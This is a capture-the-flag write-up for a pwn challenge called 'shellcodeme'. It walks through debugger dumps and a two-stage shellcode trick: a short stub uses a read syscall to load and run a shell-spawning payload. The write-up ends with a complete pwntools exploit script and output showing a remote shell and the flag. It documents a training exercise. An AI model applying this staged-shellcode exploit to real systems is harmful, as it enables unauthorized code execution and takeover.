Tags: pwn
Rating:
## === shellcodeme (Pwn: 62 solves / 420 pts) ===
I checked the status of register, stack and memory map after call rbp with ASLR disabled.
The status of register is the following.
```
RAX: 0xa ('\n')
RBX: 0x4000 ('')
RCX: 0xad6ff050f585f01
RDX: 0x7ffff7ff300b --> 0xa ('\n')
RSI: 0x7ffff7dd3790 --> 0x0
RDI: 0x7ffff7dd18e0 --> 0xfbad2088
```
The status of stack is the following.
```
0000| 0x7fffffffdda8 --> 0x40072f (<main+207>: xor edi,edi) ==> pop rdx
0008| 0x7fffffffddb0 --> 0x0
0016| 0x7fffffffddb8 --> 0x100000000
0024| 0x7fffffffddc0 --> 0x1000000000000
0032| 0x7fffffffddc8 --> 0x0
0040| 0x7fffffffddd0 --> 0x0 ==> pop rdi
0048| 0x7fffffffddd8 --> 0x0 ==> pop rax
0056| 0x7fffffffdde0 --> 0x0
```
The status of memory map is the following.
```
Start End Perm Name
0x00400000 0x00401000 r-xp /Pwn_shellcodeme/shellcodeme
0x00600000 0x00601000 r-xp /Pwn_shellcodeme/shellcodeme
0x00601000 0x00602000 rwxp /Pwn_shellcodeme/shellcodeme
0x00602000 0x00624000 rwxp [heap]
0x00007ffff7a0d000 0x00007ffff7bcd000 r-xp /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7bcd000 0x00007ffff7dcd000 ---p /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dcd000 0x00007ffff7dd1000 r-xp /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd1000 0x00007ffff7dd3000 rwxp /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd3000 0x00007ffff7dd7000 rwxp mapped
```
I thought about reading the shellcode into the rsi 's address area.
I took advantage of the reasonable data set on the stack.
The status of the server stack is the same.
Below is the state after pop of rax, rdx, rdi.
```
RAX: 0x0
RBX: 0x4000 ('')
RCX: 0xad6ff050f585f01
RDX: 0x40072f (<main+207>: xor edi,edi)
RSI: 0x7ffff7dd3790 --> 0x0
RDI: 0x0
```
I can call read syscall and read the shellcode into rsi's address area.
And I can call to rsi and start shellcode.
The assemble code is the following.
```
0x7ffff7ff3000: pop rdx
0x7ffff7ff3001: pop rdi
0x7ffff7ff3002: pop rdi
0x7ffff7ff3003: pop rdi
0x7ffff7ff3004: pop rdi
0x7ffff7ff3005: pop rdi
0x7ffff7ff3006: pop rax
0x7ffff7ff3007: syscall
0x7ffff7ff3009: call rsi
```
Final exploit code is the following.
```
from pwn import *
context(os='linux', arch='amd64')
#context.log_level = 'debug'
shellcode = asm(shellcraft.amd64.linux.sh())
BINARY = './shellcodeme'
elf = ELF(BINARY)
if len(sys.argv) > 1 and sys.argv[1] == 'r':
HOST = "shellcodeme.420blaze.in"
PORT = 420
s = remote(HOST, PORT)
else:
s = process(BINARY)
s.recvuntil("Shellcode?\n")
#buf = "\x5a\x5f\x5f\x5f\x5f\x5f\x58\x0f\x05\xff\xd6"
buf = asm("pop rdx")
buf += asm("pop rdi")*5
buf += asm("pop rax")
buf += asm("syscall")
buf += asm("call rsi")
s.sendline(buf)
sleep(0.1)
s.sendline(shellcode)
s.interactive()
```
The execution result is the following.
```
ubuntu:~/Pwn_shellcodeme$ python solve.py r
[*] '/Pwn_shellcodeme/shellcodeme'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to shellcodeme.420blaze.in on port 420: Done
[*] Switching to interactive mode
$ id
uid=1000(shellcodeme) gid=1000(shellcodeme) groups=1000(shellcodeme)
$ ls
flag
shellcodeme
$ cat flag
blaze{g0lf3d_y0ur_sh3llc0d3's_un1qu3_byt3z}
```